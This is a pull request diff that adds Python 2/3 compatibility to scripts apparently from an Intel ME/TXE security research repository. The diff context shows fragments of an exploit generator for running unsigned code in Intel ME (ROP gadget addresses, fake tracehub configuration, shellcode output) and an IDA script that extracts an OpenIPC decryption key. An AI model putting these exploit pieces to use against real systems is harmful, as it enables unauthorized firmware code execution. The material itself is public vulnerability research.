### PR TITLE
Use print() function in both Python 2 and Python 3 

### DIFF
--- a/config_decryptor.py
+++ b/config_decryptor.py
@@ -15,6 +15,11 @@ from argparse import ArgumentParser as argpars
 from Crypto.Cipher import AES
 from Crypto.Hash import SHA as sha1
 
+try:
+    xrange          # Python 2
+except NameError:
+    xrange = range  # Python 3
+
 
 def create_backup(paths):
     archiveName = strftime("OpenIPC_backup_%Y%m%d_%H%M%S.zip", gmtime())

--- a/me_exp_bxtp.py
+++ b/me_exp_bxtp.py
@@ -6,6 +6,7 @@
 #           http://blog.ptsecurity.com/2018/01/running-unsigned-code-in-intel-me.html
 #           https://github.com/ptresearch/IntelME-JTAG
 
+from __future__ import print_function
 import argparse
 import struct
 
@@ -82,7 +83,7 @@ def ParseArguments():
     return parser.parse_args().f
 
 def main():
-    print descr
+    print(descr)
     file_name = ParseArguments()
     data = GenerateShellCode()
     print ("[*] Saving to %s..." % (file_name))

--- a/me_exp_bxtp.py
+++ b/me_exp_bxtp.py
@@ -21,7 +21,7 @@ RET_ADDR_OFFSET = 0x338
 
 
 def GenerateTHConfig():
-    print ("[*] Generating fake tracehub configuration...")
+    print("[*] Generating fake tracehub configuration...")
     trace_hub_config   = struct.pack("<B", 0x0)*6
     trace_hub_config  += struct.pack("<H", 0x2)
     trace_hub_config  += struct.pack("<L", 0x020000e0)
@@ -32,7 +32,7 @@ def GenerateTHConfig():
     return trace_hub_config
 
 def GenerateRops():
-    print ("[*] Generating rops...")
+    print("[*] Generating rops...")
     #mapping DCI
     rops  = struct.pack("<L", 0x0004a76c) #side-band mapping 
     rops += struct.pack("<L", 0x0004a877) #pop 2 arguments
@@ -64,7 +64,7 @@ def GenerateRops():
 
 def GenerateShellCode():
     syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET
-    print ("[*] Generating SYSLIB_CTX struct (stack base: %x: syslib ctx base: %x)..." % (STACK_BASE, syslib_ctx_start))
+    print("[*] Generating SYSLIB_CTX struct (stack base: %x: syslib ctx base: %x)..." % (STACK_BASE, syslib_ctx_start))
     data  = GenerateTHConfig()
     init_trace_len = len(data)
     data += GenerateRops()
@@ -86,7 +86,7 @@ def main():
     print(descr)
     file_name = ParseArguments()
     data = GenerateShellCode()
-    print ("[*] Saving to %s..." % (file_name))
+    print("[*] Saving to %s..." % (file_name))
     f = open(file_name, "wb")
     f.write(data)
     f.close

--- a/openipc_key_extract.py
+++ b/openipc_key_extract.py
@@ -4,6 +4,7 @@
 #
 # Details:  https://github.com/ptresearch/IntelME-JTAG
 #           https://github.com/ptresearch/IntelTXE-POC
+from __future__ import print_function
 idaapi.get_strlist_options()
 idaapi.build_strlist()
 str_count = idaapi.get_strlist_qty()
@@ -33,4 +34,4 @@ if key_ea == idaapi.BADADDR:
     raise Exception("Can't find OpenIPC config data key")
 
 key = idaapi.get_many_bytes(key_ea, 0x10)
-print '"' + key.encode("hex") + '"'
+print('"' + key.encode("hex") + '"')


### PR DESCRIPTION
Also, __xrange()__ was removed in Python 3 in favor of __range()__ so these fixes work as expected in both Python 2 and 3.